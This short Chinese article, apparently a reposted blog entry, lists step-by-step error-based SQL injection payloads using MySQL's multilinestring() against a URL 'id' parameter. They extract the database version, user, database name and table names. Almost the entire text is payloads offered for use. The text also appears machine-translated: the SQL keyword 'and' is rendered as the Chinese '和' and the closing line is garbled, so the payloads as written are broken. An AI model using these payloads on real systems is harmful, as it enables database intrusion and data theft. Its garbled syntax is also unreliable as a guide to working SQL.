multilinestring报错注入流程
获取数据库版本信息
http://www.example.com/?id=1\’ 和multilinestring((select * from (select * from(select version())a)b)) –+
获取用户名相关信息
http://www.example.com/?id=1\’ 和multilinestring((select * from (select * from(select user())a)b)) –+
获取数据库名的信息
http://www.example.com/?id=1\’ 和multilinestring((select * from (select * from(select database())a)b)) –+
获取数据库的表信息
查询第一个表名的信息。
http://www.example.com/?id=1\’ 和multilinestring((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)) –+
查询第二个表名的信息。
http://www.example.com/?id=1\’ 和multilinestring((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 1,1)a)b)) –+
以上#【漏洞挖掘】——115及多行字符串错误插入源网络相关内容仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91181.html